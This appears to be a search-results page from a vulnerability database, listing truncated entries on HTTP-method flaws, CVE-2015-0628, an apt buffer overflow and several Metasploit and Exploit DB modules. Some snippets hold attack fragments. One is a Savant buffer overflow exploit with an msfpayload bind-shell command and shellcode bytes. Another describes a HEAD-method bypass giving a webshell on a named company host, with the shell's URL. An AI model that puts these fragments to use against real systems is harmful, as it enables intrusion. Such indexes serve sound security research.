330 matches found

Kitploit
added 2015/08/10 8:39 p.m., 20 views

HTTPie - a CLI, cURL-like tool for humans

HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output...

AI score: 7
Exploits: 0, References: 12

Tenable Nessus
added 2015/05/04 12:0 a.m., 10 views

HTTP 'PUT' Method Detection

Binary data 8699.prm...

AI score: 7.3
Exploits: 0

Tenable Nessus
added 2015/05/04 12:0 a.m., 8 views

HTTP 'DELETE' Method Detection

Binary data 8700.prm...

AI score: 7.3
Exploits: 0

NVD
added 2015/02/20 2:59 a.m., 15 views

CVE-2015-0628

The proxy engine on Cisco Web Security Appliance (WSA) devices allows remote attackers to bypass intended proxying restrictions via a malformed HTTP method, aka Bug ID CSCus79174...

CVSS: 5, AI score: 6.8, EPSS: 0.00184
Exploits: 0, References: 1

Prion
added 2015/02/20 2:59 a.m., 9 views

Design/Logic Flaw

The proxy engine on Cisco Web Security Appliance (WSA) devices allows remote attackers to bypass intended proxying restrictions via a malformed HTTP method, aka Bug ID CSCus79174...

CVSS: 5, AI score: 7.3, EPSS: 0.00184
Exploits: 0, References: 1

Cvelist
added 2015/02/20 2:0 a.m., 15 views

CVE-2015-0628

The proxy engine on Cisco Web Security Appliance (WSA) devices allows remote attackers to bypass intended proxying restrictions via a malformed HTTP method, aka Bug ID CSCus79174...

AI score: 6.8, EPSS: 0.00184
Exploits: 0, References: 1

CVE
added 2015/02/20 2:0 a.m., 43 views

CVE-2015-0628

The CVE-2015-0628 issue affects Cisco Web Security Appliance (WSA) where the proxy engine fails to properly handle malformed HTTP methods, enabling remote attackers to bypass proxying restrictions. This is a vulnerability in the proxy component that could permit unauthorized proxy traffic if an a...

CVSS: 5, AI score: 7, EPSS: 0.00184
Exploits: 0, References: 1, Affected Software: 1

Metasploit
added 2014/10/06 3:8 a.m., 40 views

Jenkins-CI Login Utility

This module attempts to login to a Jenkins-CI instance using a specific user/pass. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/credentialcollection' require...

AI score: 7.2
Exploits: 0

Tenable Nessus
added 2014/09/25 12:0 a.m., 19 views

Debian DSA-3031-1 : apt - security update

The Google Security Team discovered a buffer overflow vulnerability in the HTTP transport code in apt-get. An attacker able to man-in-the-middle a HTTP request to an apt repository can trigger the buffer overflow, leading to a crash of the 'http' apt method binary, or potentially to arbitrary cod...

CVSS: 6.8, AI score: 8.8, EPSS: 0.00681
Exploits: 0, References: 3

Debian
added 2014/09/23 4:18 p.m., 25 views

[SECURITY] [DSA 3031-1] apt security update

------------------------------------------------------------------------- Debian Security Advisory DSA-3031-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso September 23, 2014 http://www.debian.org/security/faq -...

CVSS: 6.8, AI score: 9.7, EPSS: 0.00681
Exploits: 0

seebug.org
added 2014/07/15 12:0 a.m., 20 views

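An incompletely fixed Yonyou issue can be bypassed to keep getting a shell (HTTP method protection bypass technique)

Brief description: I had just logged on to wooyun and saw a notification that a Yonyou JBOSS vulnerability had been made visible to me. So I took a quick look, and it is still possible to get in. Details: The original vulnerability is this one: http://wooyun.org/bugs/wooyun-2014-065444 A shell can no longer be obtained through /invoker/EJBInvokerServlet, and /jmx-console/ has had authentication added, but it can be bypassed with the HEAD method. Then it is just a matter of changing the request to a HEAD packet and continuing to get a shell. Proof of vulnerability: One-line shell address: http://xiaoxi.yonyou.com/tshThSIjBouKg/XbAXCDkfoW.jsp...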

AI score: 7.1
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 12 views

Savant Web Server 3.1 - Buffer Overflow Exploit (Egghunter)

No description provided by source. !/usr/bin/python import socket targetaddress=10.10.10.129 targetport=80 buffer2 = R0cX + R0cX msfpayload windows/shellbindtcp LPORT=4444 R | msfencode -e x86/shikataganai -c 4 -t c buffer2 += \xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1...

AI score: 7.1
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 19 views

Apache Struts includeParams Remote Code Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

AI score: 7.1
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 10 views

Ezhometech Ezserver 6.4 Stack Overflow Exploit

No description provided by source. Exploit Title: Ezhometech EzServer =6.4 Stack Overflow Vulnerability Author: modpr0be Contact: researchatSpenteradotcom Platform: Windows Tested on: Windows XP SP3 OptIn, Windows 2003 SP2 OptIn Software Link: http://www.ezhometech.com/buyezserver.htm References:...

AI score: 7.1
Exploits: 0

Exploit DB
added 2013/12/24 12:0 a.m., 28 views

RedHat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)

This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit4 'Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal', 'Description' = %q This module exploits a path traversal...

CVSS: 9.4, AI score: 7.4, EPSS: 0.78463
Exploits: 4

Metasploit
added 2013/12/09 6:49 p.m., 59 views

Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection

This module exploits a SQL injection vulnerability in the "explorer" action of "miq_policy" controller of the Red Hat CloudForms Management Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by changing the password of the target account to the specified password. This module...

CVSS: 7.5, AI score: 8.2, EPSS: 0.54161
Exploits: 3

Exploit DB
added 2013/06/05 12:0 a.m., 58 views

Apache Struts - includeParams Remote Code Execution (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'Apache Struts includeParams Remote Co...

AI score: 6.9
Exploits: 0

Packet Storm
added 2013/03/25 12:0 a.m., 34 views

LinkedIn Cross Site Request Forgery

============================================= INTERNET SECURITY AUDITORS ALERT 2013-001 - Original release date: January 30th, 2013 - Last revised: March 25th, 2013 - Discovered by: Vicente Aguilera Diaz - Severity: 4.3/10 CVSSv2 Base Score ============================================= I...

AI score: 0.4
Exploits: 0

Veeam
added 2013/02/15 12:0 a.m., 10 views

Configuring Veeam Backup Cloud Edition with HP Cloud

Challenge Specifying a container in HP Cloud account settings results in the following error: Incorrect HTTP method used in the request 26301 Fault Name: IncorrectHTTPMethod Error Type: MethodValidationFailure Description: Incorrect HTTP method used in the request Service: publiccsservices...

AI score: 7.2
Exploits: 0

Metasploit
added 2013/02/11 10:48 p.m., 50 views

Ruby on Rails JSON Processor YAML Deserialization Scanner

This module attempts to identify Ruby on Rails instances vulnerable to an arbitrary object instantiation flaw in the JSON request processor. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Ruby...

CVSS: 7.5, AI score: 0.2, EPSS: 0.91907
Exploits: 22